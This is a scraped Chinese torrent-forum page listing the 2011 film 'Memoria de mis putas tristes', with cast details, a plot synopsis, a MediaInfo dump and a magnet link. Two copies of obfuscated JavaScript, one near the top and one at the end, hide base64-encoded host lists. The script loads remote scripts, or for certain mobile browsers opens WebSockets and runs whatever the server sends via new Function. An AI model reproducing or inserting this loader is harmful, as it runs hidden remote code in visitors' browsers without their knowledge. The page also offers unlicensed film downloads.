苦妓追忆录[中文字幕].Memoria.De.Mis.Putas.Tristes.2011.1080p.BluRay.DTS.x265-10bit 5.66GB

版主小s 1月前 577

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 苦妓追忆录 / 我的郁妓回忆录(台) / 伤妓咏 / 苦妓回忆录 / 昔年种柳 / 伤心妓女的回忆 / Memorias de mis putas tristes / Memories of My Melancholy Whores
◎片  名 Memoria de mis putas tristes
◎年  代 2011
◎产  地 墨西哥 / 西班牙 / 丹麦 / 美国
◎类  别 爱情
◎语  言 西班牙语
◎上映日期 2012-05-03
◎IMDb链接 https://www.imdb.com/title/tt1504019/
◎豆瓣评分 6.8/10 (938人评价)
◎豆瓣链接 https://movie.douban.com/subject/4019612/
◎片  长 97分钟
◎导  演 卡尔森·亨宁 Henning Carlsen (id:1019602)
       里卡多·德尔里奥 Ricardo Del Río (id:1006062)
◎编  剧 卡尔森·亨宁 Henning Carlsen (id:1019602)
       让-克劳德·卡里埃尔 Jean-Claude Carrière (id:1050366)
       加夫列尔·加西亚·马尔克斯 Gabriel García Márquez (id:1032502)
◎演  员 杰拉丁·卓别林 Geraldine Chaplin (id:1025238)
       亚力杭德拉·巴罗斯 Alejandra Barros (id:1067166)
       埃米利洛·艾切瓦利亚 Emilio Echevarría (id:1282964)
       多米妮卡·帕莱塔 Dominika Paleta (id:1126379)
       奥费莉娅·梅迪纳 Ofelia Medina (id:1118438)
       奥利维亚·莫丽娜 Olivia Molina (id:1122392)
       伊万格丽娜·索莎 Evangelina Sosa (id:1151580)
       加斯东·梅洛 Gastón Melo (id:1291804)
       达米安·阿尔卡扎 Damián Alcázar (id:1059768)
       Jason Solowsky Jason Solowsky (id:1042241)

◎标  签 马尔克斯 / 爱情 / 墨西哥 / 伦理 / 墨西哥电影 / 小说改编 / 美国 / 电影

◎简  介
  九十岁的老记者(Marco Antonio Trevi?o 饰)要迎来自己的寿辰,于是致电老朋友——妓院老鸨罗萨(Geraldine Chaplin 饰),要求她为自己找一个处女过夜。一位年轻的女工(Alejandra Barros 饰从此进入老人的生活,白天,她在工厂缝扣子,晚上,她穿过半个城市来到妓院,裸露睡下供老人把玩,在他面前始终昏迷不醒。老人把她叫作德尔加蒂娜,慢慢发觉自己爱上了她,在沉睡的她面前,他回忆起自己一生的所有风流荒唐,家里的洗衣妇,订过婚又被他抛弃的女孩,夜夜笙歌的妓院美景……他越来越发觉自己已经离不开德尔加蒂娜,而她在他睡着后也会偷偷观察他的一切,对他颇有好感,但是一场意外发生的凶杀案令妓院被迫关闭,德尔加蒂娜就此不见,老人开始发疯寻找……

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 235228187199375530237139765426581659077 (0xB0F74D0B0065B6ECC78F3607091BDDC5)
  4. Complete name                            : Memo[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.66 GiB
  8. Duration                                 : 1 h 36 min
  9. Overall bit rate                         : 8 360 kb/s
  10. Movie name                               : Memoria De Mis Putas Tristes 2011 1080p BluRay DTS [email protected]
  11. Encoded date                             : UTC 2021-09-22 03:51:01
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 1 h 36 min
  21. Bit rate                                 : 6 826 kb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 1 080 pixels
  24. Display aspect ratio                     : 16:9
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 24.000 FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.137
  31. Stream size                              : 4.62 GiB (82%)
  32. Title                                    : [email protected]
  33. Writing library                          : x265 - H.265/HEVC codec
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : DTS
  39. Format/Info                              : Digital Theater Systems
  40. Codec ID                                 : A_DTS
  41. Duration                                 : 1 h 36 min
  42. Bit rate mode                            : Constant
  43. Bit rate                                 : 1 509 kb/s
  44. Channel(s)                               : 6 channels
  45. Channel layout                           : C L R Ls Rs LFE
  46. Sampling rate                            : 48.0 kHz
  47. Frame rate                               : 93.750 FPS (512 SPF)
  48. Bit depth                                : 24 bits
  49. Compression mode                         : Lossy
  50. Stream size                              : 1.02 GiB (18%)
  51. Title                                    : Spanish
  52. Language                                 : Spanish
  53. Default                                  : Yes
  54. Forced                                   : No
  55. Text #1
  56. ID                                       : 3
  57. Format                                   : PGS
  58. Muxing mode                              : zlib
  59. Codec ID                                 : S_HDMV/PGS
  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  61. Duration                                 : 1 h 32 min
  62. Bit rate                                 : 19.2 kb/s
  63. Count of elements                        : 1534
  64. Stream size                              : 12.7 MiB (0%)
  65. Title                                    : CHS
  66. Language                                 : Chinese
  67. Default                                  : Yes
  68. Forced                                   : No
  69. Text #2
  70. ID                                       : 4
  71. Format                                   : PGS
  72. Muxing mode                              : zlib
  73. Codec ID                                 : S_HDMV/PGS
  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  75. Duration                                 : 1 h 32 min
  76. Bit rate                                 : 19.4 kb/s
  77. Count of elements                        : 1534
  78. Stream size                              : 12.8 MiB (0%)
  79. Title                                    : CHT
  80. Language                                 : Chinese
  81. Default                                  : No
  82. Forced                                   : No
  83. Menu
  84. 00:00:00.000                             : en:Chapter 01
  85. 00:01:54.833                             : en:Chapter 02
  86. 00:08:09.333                             : en:Chapter 03
  87. 00:16:19.792                             : en:Chapter 04
  88. 00:22:16.083                             : en:Chapter 05
  89. 00:32:04.292                             : en:Chapter 06
  90. 00:38:24.292                             : en:Chapter 07
  91. 00:43:37.708                             : en:Chapter 08
  92. 00:48:10.625                             : en:Chapter 09
  93. 00:54:59.458                             : en:Chapter 10
  94. 00:59:36.083                             : en:Chapter 11
  95. 01:05:13.125                             : en:Chapter 12
  96. 01:10:23.042                             : en:Chapter 13
  97. 01:17:22.500                             : en:Chapter 14
  98. 01:23:13.000                             : en:Chapter 15
  99. 01:32:53.500                             : en:Chapter 16


TAGS 爱情

磁力链:
  • magnet:?xl=19355&xt=urn:btih:CBA5FDB4573651EE7FAD2B8005DEE59E991E3120

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};